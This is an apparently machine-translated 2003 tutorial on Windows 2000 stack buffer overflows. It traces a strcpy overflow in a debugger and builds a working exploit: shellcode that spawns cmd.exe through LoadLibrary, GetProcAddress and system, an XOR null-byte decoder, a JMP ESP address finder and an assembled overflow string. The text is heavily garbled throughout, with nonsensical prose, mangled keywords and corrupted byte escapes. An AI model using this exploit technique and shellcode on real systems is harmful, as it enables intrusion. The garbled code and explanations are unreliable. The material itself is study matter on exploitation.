Windows 2000 buffer overflow technology principle
Author: yellow
E-mail: Yellow@safechina.net
HOME Page: www.safechina.net
Date: 2003-09-16
Preface:
I feel too simple when I see Jason's Backend translation. "I feel too simple. I didn't talk about real.
The principle, I can't believe that it will be an old written article. On the contrary, IPXODI and Yuan Ge's buffer spillical principle and advanced
Shellcode wrote a skill, I feel very good, very professional, it is an art, it seems that my country's security technology is already
Improve the advanced countries such as Europe and the United States. But the first mysteria, the semaphore is still very small, and it is very few (I
Haven't seen it yet), so I am determined to write this article, distribute from the local variables of C and the relationship between it and the stack, return address and
The relationship between the stack, the local variable and the return address, and the relationship of the stack start to write, and the simple application is made after the principle is described.
Combine the theoretical and application to give the majority of first school buffering friends a little help, this article is typical,
Through this study, we can let us know from a normal C programmer, understand the bottom-up technology, although this article is a beginner (
It is the first school to buffer, not the first school C language), the author assumes that you (readers) is already a skilled C programmer, and understand some
ASM programming technology. I am also a sudden buffer overflow, this is my first write overflow technology, so it is inevitable that there is a wrong place.
Please refer to it, I have learned a lot in IPXODI and Yuan Ge, but IPXODI and Yuan Ge and the article are relatively professional.
It is difficult for beginners to learn, especially, I am also a non-computer professional (I am the same as the Great League).
Learn to the small four brother, huh, huh!). Here, a little understanding of my study, a little experience introduced to everyone, I hope to buffer the majority of learning
Friends who spilled!
Chapter 1 stores allocation, local memory variable, stack and function call
1. First write a simple C-character string copy program
//test.c
#include
#include
#include
Void Overflow (Void)
{
Char BUF [10];
STRCPY (BUF, "Aaaaaaaaaa);
} // end overflow
Int main (void)
{
Overflow ();
Return 0;
} // end main
2. Press F11 to enter the "Step Into" debug mode, in fact, you only need to pay attention to the assembly block for our research and learning, as follows:
1: #include
2: #include
3: #include
4:
5: Void overflow (void)
6: {
00401020 55 PUSH EBP
00401021 8B EC MOV EBP, ESP
00401023 83 EC 4C SUB ESP, 4CH
00401026 53 Push EBX
00401027 56 PUSH ESI
00401028 57 Push EDI
00401029 8D 7D B4 LEA EDI, [EBP-4CH]
0040102C B9 13 00 00 00 MOV ECX, 13H
00401031 B8 CC CC CC CC MOV EAX, 0cccccccch
00401036 F3 AB Rep Stos DWORD PTR [EDI]
7: char buf [10];
8: STRCPY (BUF, "Aaaaaaaaaa);
00401038 68 1C F0 41 00 push offset string "aaaaaaaaa" (0041f01c)
0040103D 8D 45 F4 LEA EAX, [EBP-0CH]
00401040 50 Push EAX
00401041 E8 6A 00 00 00 Call strcpy (004010B0) 00401046 83 C4 08 Add ESP, 8
9:
10:} // end overflow
00401049 5F POP EDI
0040104A 5E POP ESI
0040104B 5B POP EBX
0040104C 83 C4 4C Add ESP, 4CH
0040104F 3B EC CMP EBP, ESP
00401051 E8 4A 01 00 00 Call __chkesp (004011a0)
00401056 8B E5 MOV ESP, EBP
00401058 5D POP EBP
00401059 C3 RET
11:
12: Int main (void)
13: {
00401070 55 PUSH EBP
00401071 8B EC MOV EBP, ESP
00401073 83 EC 40 SUB ESP, 40H
00401076 53 Push EBX
00401077 56 PUSH ESI
00401078 57 Push EDI
00401079 8D 7D C0 LEA EDI, [EBP-40H]
0040107C B9 10 00 00 00 MOV ECX, 10H
00401081 B8 CC CC CC CC MOV Eax, 0cccccccch
00401086 F3 AB Rep Stos DWORD PTR [EDI]
14: overflow ();
00401088 E8 7D FF FF FF CALL @ ilt 5 (overflow) (0040100A)
15: Return 0;
0040108D 33 c0 xor Eax, EAX
16:} // End main
0040108F 5F POP EDI
00401090 5e POP ESI
00401091 5B POP EBX
00401092 83 C4 40 Add ESP, 40H
00401095 3B EC CMP EBP, ESP
00401097 E8 04 01 00 00 Call __chkesp (004011a0)
0040109C 8B E5 MOV ESP, EBP
0040109E 5D POP EBP
0040109F C3 RET
3. Return to vStudio IDE, set the breakpoint at the overflow function, select the "Run" menu item again.
The program stopped before calling overflow. (The following learning you need to keep watching the ASM block above)
Now look at the parameters you need to pay attention to before calling Overflow, join them to the "Watch" window.
ESP 0x0012FF34 (Note: These values may not be the same while running on different machines)
EBP 0x0012FF80
BUF variables have not been assigned
Overflow 0x00401020
Main 0x00401070
4. Press F11 Track to enter Overflow, let the program stop in 6:
Take a few main parameters now
ESP = 0x0012FF30, other unchanged (referring to several identifiers of our Watch, the EIP must change)
Obviously, the stack is pressing a DWORD (4 bytes) data to see what it is, open the Memory window.
Enter ESP, right click on the window content, select "Long Hex Format", the current stack top content 0x0040108D,
Now take a look at the next line of call overflow, if you can't find the "15:" string,
I saw it! Pressing the next command address of Call overflow, that is, what we usually say "" function returns
Back address.
Press F11 (execute push ebp), then look at several main parameters
ESP = 0x0012FF2C, now the value of EBP is 0x0012FF80,
Press F11 (executing the following statement), the program saves the current ESP value in EBP: MOV EBP, ESP then starts allocating local variables
Sub ESP, 4CH; Assign 76 (0x4c) bytes this place I don't quite clear why I always have to retain 64 (0x40) bytes,
In fact, only 12 (0x0c) bytes are available, then 7 sentence instructions:
00401026 53 Push EBX
00401027 56 PUSH ESI
00401028 57 Push EDI
00401029 8D 7D B4 LEA EDI, [EBP-4CH]
0040102C B9 13 00 00 00 MOV ECX, 13H
00401031 B8 CC CC CC CC MOV EAX, 0cccccccch
00401036 F3 AB Rep Stos DWORD PTR [EDI]
Fill this 76 bytes in dword (4) into 0xccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc,
Let's stop in the following REP Stos DWORD PTR [EDI]. Join EIP and an expression in the Watch window.
"EBP-0CH" will find the same as the address of "EBP-0CH" and BUF, which is part of the compiler in the stack.
The starting address of the memory variable (if you know the principle of compilation, it is easy to understand), enter EBP-0CH in the Memory window.
(Variable Start Address), right-click window to select "Byte Format", you can see that there are 12 bytes inside are filled with 0xcc.
Ok! Now tracking the Call StRCPY, then look at the contents of the Memory window, there are 11 bytes filled, the top 10 filled
0x61 ASCII characters 'a', the latter byte is 0 This verifies that the C-character string operation function always generates an empty termination character.
Look down, click on "Long Hex Format" to see that they are 0x0012FF80 and 0x0040108D, what? A bit
Cooked? Yes! I also feel a bit familiar, why? Please look back at the beginning of the 4th section, find the answer?
Is "old eBP" and "function return address", continue to track the following movements, restore the main register content,
Add ESP 4ch destroyed the local memory variable recovered old EBP (at this time, the content of the stack is 0x0040108D), then return back
(In fact, RET is equivalent to executing "POP EIP", but there is no such instruction) to perform the contents of EIP after this instruction.
For 0x0040108d, it has already returned to the main function, and almost the same action will be performed in the main function, and finally the program is executed.
Some people may ask OVERFLOW to return to main, so I use a return, but what is the RET in Main Do what is used?
In fact, beginners may not know the spatial structure of the program after our C program (simplified) is like this.
----------------------------------
// Program entry point (Program entry Point)
.
.
.
Call_main
Push EAX
Call_exitprocess
.
----------------------------------
// void overflow (void)
Push EBP
.
.
.
Call _STRCPY
.
.
.
RET
----------------------------------
// int main (void)
Push EBP
.
.
.
Call_overflow
.
.
.
RET
----------------------------------
The RET in OVERFLOW allows the program back to Main, and RET in Main is to return to the entry point program to return the operating system.
Summary: In the first chapter, we learned some things for understanding the buffer to overflow the foundation, such as local memory variables.
What is allocated, it is in the relationship of the stack and the function call, the function returns the relationship between the address and the stack, and understand these things
We can make some simple applications, for the purpose of learning principles, in the next chapter, we will use buffers to implement a command console window (cmd.exe), if you need more practical, you can refer to IPXoDi and Yuan Ge
Related Articles.
Chapter II uses overflow coverage, changing program flow and its simple application
In the first quarter, address coverage
The same is the program at the beginning of the first chapter, let us change into a program with buffering problems.
//test.c
#include
#include
#include
Void Overflow (Void)
{
Char BUF [10];
STRCPY (BUF, "Aaaaaaaaaaab1234"); // <= ----- Change here in the original ten 'a' and add "B1234"
} // end overflow
Int main (void)
{
Overflow ();
Return 0;
} // end main
Re-compile, set breakpoints at Strcpy, then there is no error to run to the breakpoint, switch to the assembly code window
00401020 55 PUSH EBP
00401021 8B EC MOV EBP, ESP
00401023 83 EC 4C SUB ESP, 4CH
00401026 53 Push EBX
00401027 56 PUSH ESI
00401028 57 Push EDI
00401029 8D 7D B4 LEA EDI, [EBP-4CH]
0040102C B9 13 00 00 00 MOV ECX, 13H
00401031 B8 CC CC CC CC MOV EAX, 0cccccccch
00401036 F3 AB Rep Stos DWORD PTR [EDI]
7: char buf [10];
8: STRCPY (BUF, "Aaaaaaaaaaab1234"); // <= ----- Let the program stop here
00401038 68 1C F0 41 00 Push Offset String "AAAAAAAAAAB1234" (0041F01C)
0040103D 8D 45 F4 LEA EAX, [EBP-0CH]
00401040 50 Push EAX
00401041 E8 6A 00 00 00 Call strcpy (004010B0)
00401046 83 C4 08 Add ESP, 8
9:} // end overflow
00401049 5F POP EDI
0040104A 5E POP ESI
0040104B 5B POP EBX
0040104C 83 C4 4C Add ESP, 4CH
0040104F 3B EC CMP EBP, ESP
00401051 E8 4A 01 00 00 Call __chkesp (004011a0)
00401056 8B E5 MOV ESP, EBP
00401058 5D POP EBP
00401059 C3 RET
Add EBP and BUF on the Watch window, and enter "BUF" in the Memory window to see the STRCPY function performs the previous stack, select
"Long Hex Format" can see the current stack situation as follows:
0012FEE0 CCCCCCCC
.
.
.
.
0012FF20 cccccccccc // <= ------ BUF start address (once again emphasized, the value here can be different), 12 bytes available
0012ff24 ccccccccc
0012ff28 ccccccccccccc
0012FF2C 0012FF80 // <= ---- Old EBP is filled in the PUSH EBP instruction from the beginning of the function
0012FF30 0040108D // <= ---- The function returns the address, that is, the lower command address of the Call overflow instruction in the main function can also be represented as:
[64 reserved bytes (filled with 0xcc)]
[buf (12 available bytes, all currently filled with 0xcc)]
Old EBP (current 0x0012FF80)]
[Function return address (current 0x0040108D)]
Press F10 until the Call StRCPY is executed and then look at the red part of the Memory window, select "Byte Format", starting from the start address of the BUF
Ten 0x61 ('A'), one 0x62 ('b'), 0x31 ('1'), 0x32 ('2'), 0x33 ('3'), 0x34 ('4'), and One 0x00, can
To see "old EBP" has been changed by us:
0012FEE0 CCCCCCCC
.
.
.
.
0012FF20 61 61 61 61 AAAA / / <= ---- BUF start address, the content has changed
0012FF24 61 61 61 61 AAAA
0012FF28 61 61 62 31 AAB1 / / <= ---- Note !!!!!
0012FF2C 32 33 34 00 234. // <= ---- Old EBP content has been changed
0012FF30 8D 10 40 00 .. @. // <= ---- Function Return Address None
Look at the places I just pay attention to, 'b' and '1' populate the last two bytes of the 12 available bytes of BUF, and the back '2', '3', '4' and 0x00 As a
DWORD overrides (modify) the value of EBP, then one of the DWORD is the function returns the address, then press F10 to execute, the program can return main (because we have no modification
Back to the address value), see the change function returns the address to another arbitrary value (let the program process jump to another address space) I think there is no difficulty!
Maybe a friend who may begin to buffer overflow will ask "What is this?", Don't worry about us to see what this technology can do!
In the second section, use the address overwritten, jump and execute any code
This part will start more complex, your C / ASM mixed programming technology will get calcined, write a program to open a cmd.exe principle:
Use loadLibrary ("msvcrt.dll") to load VC runtime library (Runtime Library)
Use getProcaddress ("system") to get the SYSTEM function's delivery, the system function does not need me to say it! If you don't understand, please refer to MSDN.
Use SYSTEM ("cmd.exe") to open the cmd.exe command console
The procedure is as follows
#include
Void main (void)
{
__ASM
{// Simulate the program structure in a function, we own allocate space to store "msvcrt.dll", "system", "cmd.exe" three strings
Push EBP
Push ECX
Push Edx
MOV EBP, ESP
Sub ESP, 20H // Assign 32 (0x20) bytes is already enough
XOR ECX, ECX
/ ************************************* /
// Call the LoadLibrary function to load MSVCRT.DLL
MOV BYTE PTR [EBP-0BH], 'M'
MOV BYTE PTR [EBP-0AH], 'S'
MOV BYTE PTR [EBP-09H], 'V'
MOV BYTE PTR [EBP-08H], 'C'
MOV BYTE PTR [EBP-07H], 'R'
MOV BYTE PTR [EBP-06H], 'T'mov Byte Ptr [EBP-05H],'. '
MOV BYTE PTR [EBP-04H], 'D'
MOV BYTE PTR [EBP-03H], 'L'
MOV BYTE PTR [EBP-02H], 'L'
MOV BYTE PTR [EBP-01H], 0
Lea Eax, [EBP-0BH]
Push EAX
MOV ECX, 77E6A254H; // <= ---- LoadLibrary function address obtained with Depends, which is constant on my machine, you may want to modify this article
Call ECX
Mov Edx, Eax // Save the start address of MSVCRT.DLL after loading
// Call getProcAddress to get the SYSTEM function
MOV BYTE PTR [EBP-0BH], 'S'
MOV BYTE PTR [EBP-0AH], 'Y'
MOV BYTE PTR [EBP-09H], 'S'
MOV BYTE PTR [EBP-08H], 'T'
MOV BYTE PTR [EBP-07H], 'E'
MOV BYTE PTR [EBP-06H], 'M'
MOV BYTE PTR [EBP-05H], 0
Lea Eax, [EBP-0BH]
Push EAX
Push Edx
MOV ECX, 77E69AC1H; // <= ---- The same use of Depends, you may want to modify it when you learn this article
Call ECX
MOV EDX, Eax // Save the start address of the obtained System function in memory
// Call the SYSTEM to turn on the CMD environment
MOV BYTE PTR [EBP-0BH], 'C'
MOV BYTE PTR [EBP-0AH], 'M'
MOV BYTE PTR [EBP-09H], 'D'
MOV BYTE PTR [EBP-08H], '.'
MOV BYTE PTR [EBP-07H], 'E'
MOV BYTE PTR [EBP-06H], 'X'
MOV BYTE PTR [EBP-05H], 'E'
MOV BYTE PTR [EBP-04H], 0
Lea Eax, [EBP-0BH]
Push EAX
Call Edx
Add ESP, 4; // System Function Using C Call Connection (Its prototype does not use WinAPI to adjust the stack by the caller
/ ************************************* /
MOV ESP, EBP
POP EDX
POP ECX
POP EBP
}
}
Compile, run the command console, transfer to the Step INTO debug mode, select "Disassembly" and "Code Bytes" to get the machine code as follows:
Char code [] = "/ x55 / x51 / x52 / x8b / Xec / x83 / XEC / X20 / x33 / xc9"
"/ XC6 / X45 / XF5 / X6D / XC6 / X45 / XF6 / X73 / XC6 / X45"
"/ XF7 / X76 / XC6 / X45 / XF8 / X63 / XC6 / X45 / XF9 / X72"
"/ xc6 / x45 / xfa / x74 / xc6 / x45 / xfb / x2e / xc6 / x45"
"/ XFC / X64 / XC6 / X45 / XFD / X6C / XC6 / X45 / XFE / X6C"
"/ XC6 / X45 / XFF / X00 / X8D / X45 / XF5 / X50 / XB9 / X54" // <= ---- Note: The first 0x00
"/ Xa2 / XE6 / X77 / XD / XD1 / X8B / XD0 / XC6 / X45 / XF5" "/ X73 / XC6 / X45 / XF6 / X79 / XC6 / X45 / XF7 / X73 / XC6"
"/ X45 / XF8 / X74 / XC6 / X45 / XF9 / X65 / XC6 / X45 / XFA"
"/ x6d / xc6 / x45 / xfb / x00 / x8d / x45 / xf5 / x50 / x52" // <= ---- second 0x00
"/ xb9 / xc1 / x9a / xe6 / x77 / xff / xd1 / x8b / xd0 / xc6"
"/ X45 / XF5 / X63 / XC6 / X45 / XF6 / X6D / XC6 / X45 / XF7"
"/ x64 / xc6 / x45 / xf8 / x2e / xc6 / x45 / xf9 / x65 / xc6"
"/ x45 / xfa / x78 / xc6 / x45 / xfb / x65 / xc6 / x45 / xfc"
"/ x00 / x8d / x45 / xf5 / x50 / xff / xd2 / x83 / xc4 / x04" // <= ---- third 0x00
"/ x8b / x5a / x59 / x5d"
If you don't understand how to adjust the parameters in the assembly language, please refer to the relevant information of Luo Yunlin's big brother.
After the first chapter and the second chapter, so many analyzes your mind should have a shellcode's prototype! Here our overflow strings are no longer used.
AAAAAAAAAAAAB1234 is designed to be such: AaaaaaaaaabBDDDDDXXXXCCCCCCCCC ...... format.
The top 10 A and 2 'b' The action is unchanged (in fact, "foot stone"), 4 DDDD override EBP, XXXX is the memory address of JMP ESP instructions (it covers the program original
Return address), the rear ccccccccccccc ... is the machine code of the acquisition command console program we have next (encoded).
When the string overflows Overflow RET lets EIP = XXXX (execute JMP ESP), then the ESP points to our command console program, so that the original return should be returned to the main function.
The procedure for continuing execution is changed to perform our code. There is still a small problem with the string of C. The first 0x00 place in the Code string (a total of three
Truncate our shellcode at a 53rd offset, a 95 offset, and a 140 offset, so that the code we want to perform will not be executed, so
Shellcode must be encoded to be 0x00 different or 0x99, and dynamically decode after overflow, this requires a decoding program to add in front of shellcode, after overflow it will be held first
OK, it uses the encoded 0x99 decoded (restore) in Shellcode into 0x00, encoding I refer to IPXoDi's different or 0x99 method, in this article I use different decoding algorithms,
First encode the code as this:
"/ X55 / X51 / X52 / X8B / XEC / X83 / XEC / X20 / X33 / XC9"
"/ XC6 / X45 / XF5 / X6D / XC6 / X45 / XF6 / X73 / XC6 / X45"
"/ XF7 / X76 / XC6 / X45 / XF8 / X63 / XC6 / X45 / XF9 / X72"
"/ xc6 / x45 / xfa / x74 / xc6 / x45 / xfb / x2e / xc6 / x45"
"/ XFC / X64 / XC6 / X45 / XFD / X6C / XC6 / X45 / XFE / X6C"
"/ XC6 / X45 / XFF / X99 / X8D / X45 / XF5 / X50 / XB9 / X54" // <= ---- First encoded 0x99, please compare the value of the corresponding position before encoding
"/ Xa2 / XE6 / X77 / XFF / XD1 / X8B / XD0 / XC6 / X45 / XF5"
"/ x73 / xc6 / x45 / xf6 / x79 / xc6 / x45 / xf7 / x73 / xc6"
"/ X45 / XF8 / X74 / XC6 / X45 / XF9 / X65 / XC6 / X45 / XFA"
"/ x6d / xc6 / x45 / xfb / x99 / x8d / x45 / xf5 / x50 / x52" // <= ---- second encoded 0x99 "/ XB9 / XC1 / X9A / XE6 / X77 / XFF / xd1 / x8b / xd0 / xc6 "
"/ X45 / XF5 / X63 / XC6 / X45 / XF6 / X6D / XC6 / X45 / XF7"
"/ x64 / xc6 / x45 / xf8 / x2e / xc6 / x45 / xf9 / x65 / xc6"
"/ x45 / xfa / x78 / xc6 / x45 / xfb / x65 / xc6 / x45 / xfc"
"/ x99 / x8d / x45 / xf5 / x50 / xd2 / x83 / xc4 / x04" // <= ---- third encoded 0x99
"/ x8b / Xe5 / x5a / x59 / x5d";
Need to add the following decoder program on its head:
__ASM
{
MOV EAX, ESP; // This is the first instruction executed after the overflow executing the JMP ESP, and the ESP points to the current command address, the meaning is "obtaining the decoding program)
Add Eax,
49h; // This decoding subroutine has 20 bytes (decoding program at the address 20 = Code), plus 53 offset) Make Eax points to the first encoded 0x99
XOR [EAX], 99H / / Decoding the first 0x99, this operation is "0x99 different or 0x99 = 0x00", that is, the original 0x00
Add Eax, 28h // Pointing to the 95 offset
XOR [EAX], 99H // Decoding the second 0x99
Add Eax, 2E // pointing to the 140th offset
XOR [EAX], 99H // Decoding the third 0x99
}
The JMP ESP instruction address is found by the simple program below, please refer to Backend's related information:
#include "stdafx.h"
#include "find.h"
#ifdef _Debug
#define new debug_new
#undef this_file
Static char this_file [] = __file__;
#ENDIF
/
// the one and only application objection Object
CWINAPPPP;
Using namespace std;
INT_Tmain (int Argc, tchar * argv [], tchar * envp [])
{
INT nretcode = 0;
// Initialize MFC and Print and Error On Failure
IF (! Afxwininit (:: getModuleHandle (Null), NULL, :: getcommandline (), 0))
{
// Todo: Change Error Code To Suit your Needs
CERR << _T ("Fatal Error: MFC Initialization Faled") << ENDL;
NRETCODE = 1;
}
Else
{
#if 0
Return 0;
__ASM JMP ESP
#ELSE
BOOL WE_LOADED_IT = FALSE;
Hinstance h;
TCHAR DLLNAME [] = _T ("MSVCRT");
H = getModuleHandle (DLLNAME);
IF (h == NULL)
{
H = loadingLibrary (DLLNAME);
IF (h == NULL)
{
Cout << "ERROR Loading DLL:" << Dllname << Endl;
Return 1;
}
WE_LOADED_IT = True;}
BYTE * PTR = (byte *) h;
Bool Done = false;
For (int y = 0;! done; y )
{
Try
{
IF (PTR [Y] == 0xFF && PTR [Y 1] == 0xE4)
{
INT POS = (int) PTR Y;
COUT << "opcode found at 0x" << HEX << POS << Endl;
}
}
Catch (...)
{
Cout << "End of" << Dllname << "Memory Reached" << ENDL;
DONE = true;
}
}
IF (WE_LOADED_IT) FREELIBRARY (H);
#ENDIF
}
Return nretcode;
}
The JMP ESP code found on my machine is in the 0x78024e02 address, so that we have collected all the information:
(Overflow point, JMP ESP code address, encoded shellcode and subroutine of SHELLCODE)
Shellcode = overflow string JMP ESP decoding subroutine code (after encoding) get the following code:
#include
#include
#include
#include
Char Xcode [] = "aaaaaaaaaabbddddd"
"/ x02 / x4e / x02 / x78" // JMP ESP code address, different machine different dynamic connection library version may not be the same
"/ x8b / xc4 / x83 / xc0 / x49 / x80 / x30 / x99 / x83 / xc0" // decoder subroutine
"/ x29 / x80 / xc0 / x2e / x80 / x30 / x99"
"/ x55 / x51 / x52 / x8b / xec / x83 / xec / x20 / x33 / xc9" // Open CMD.exe program (CODE)
"/ XC6 / X45 / XF5 / X6D / XC6 / X45 / XF6 / X73 / XC6 / X45"
"/ XF7 / X76 / XC6 / X45 / XF8 / X63 / XC6 / X45 / XF9 / X72"
"/ xc6 / x45 / xfa / x74 / xc6 / x45 / xfb / x2e / xc6 / x45"
"/ XFC / X64 / XC6 / X45 / XFD / X6C / XC6 / X45 / XFE / X6C"
"/ XC6 / X45 / XFF / X99 / X8D / X45 / XF5 / X50 / XB9 / X54"
"/ Xa2 / XE6 / X77 / XFF / XD1 / X8B / XD0 / XC6 / X45 / XF5"
"/ x73 / xc6 / x45 / xf6 / x79 / xc6 / x45 / xf7 / x73 / xc6"
"/ X45 / XF8 / X74 / XC6 / X45 / XF9 / X65 / XC6 / X45 / XFA"
"/ x6d / xc6 / x45 / xfb / x99 / x8d / x45 / xf5 / x50 / x52"
"/ xb9 / xc1 / x9a / xe6 / x77 / xff / xd1 / x8b / xd0 / xc6"
"/ X45 / XF5 / X63 / XC6 / X45 / XF6 / X6D / XC6 / X45 / XF7"
"/ x64 / xc6 / x45 / xf8 / x2e / xc6 / x45 / xf9 / x65 / xc6"
"/ x45 / xfa / x78 / xc6 / x45 / xfb / x65 / xc6 / x45 / xfc"
"/ x99 / x8d / x45 / xf5 / x50 / xd2 / x83 / xc4 / x04" / x8b / x5 / x59 / x5d ";
Void Overflow (Void)
{
Char BUF [10];
STRCPY (BUF, XCODE); // Simulation overflow vulnerability
} // end overflow
Int main (void)
{
LoadLibrary ("msvcrt.dll"); // simulates MSVCRT.DLL introduced by the attack application (here only simulation, some vulnerabilities do not introduce this library)
Overflow ();
Return 0;
} // end main
This program is compiled, debugged, and running by VC 6.0 in Windows 2000 Pro 5.00.2195 SP2.
Chapter 2 Summary:
Write an overflow attack test program requires the following steps:
1. Discover and determine the overflow point of the vulnerability program
2, find the JMP ESP command address
3, write and optimize the shellcode program code (C or ASM), if necessary, add / decode program (such as the example mentioned herein) if necessary
4, debugging, test code validity, publishing code (if it is not very dangerous, otherwise it may violate the law)
on:
Programming is a highly artistic technology, but now many people (programmers) but say "do not need classic algorithms, do not need data structure, no need
Bottomworking technology, we can't do any other companies, light use VB.NET to develop, earning money is enough. ", I have to say that these people are not
Real programmers, I worship Xfocus's Flashsky and NSFOCUS's IPXODI, Yuan Ge, Xiao Fauchi, etc., there are also many people who are not calculated.
Machine professional, can be the programmer in my mind, I will work hard to learn, and constantly enrich myself, I hope I will in the future.
Become the Flashsky ...!
At last:
The overflow attack is more complicated than this description (this article is just a profiling principle, after fully understanding this article, you can also try exercises)
First, overflow points are difficult to determine (calculate), which requires you skilled use of anti-assessment tools and debugging tools, and have a lot of debugging experience (see a certain asM code)
I can imagine its C code indicated), and the SHELLCODE does not have platform dependencies, that is, the better it is, and you don't expect you.
Shellcode written for Windows can be used on UNIX / Linux, and vice versa), it is best to dynamically introduce all functions used in shellcode.
(With the LoadLibrary and getProcaddress function, this is why I use them in the second chapter to open cmd.exe, Yuan Ge wrote
Chapter
Come! Living Buddha is blocked ;-))
In addition, shellcode's editable / decoding subroutine is equally important, and the quality of the preparation directly determines whether the code is complete, and there is also a deep thing to learn.
Jihe research.
I finally completed this overflow technical article, I think my brain is now like a stack to overflow :-), can't stand, don't say, goodbye!
Writen by Yellow from
Www.safechina.net
.
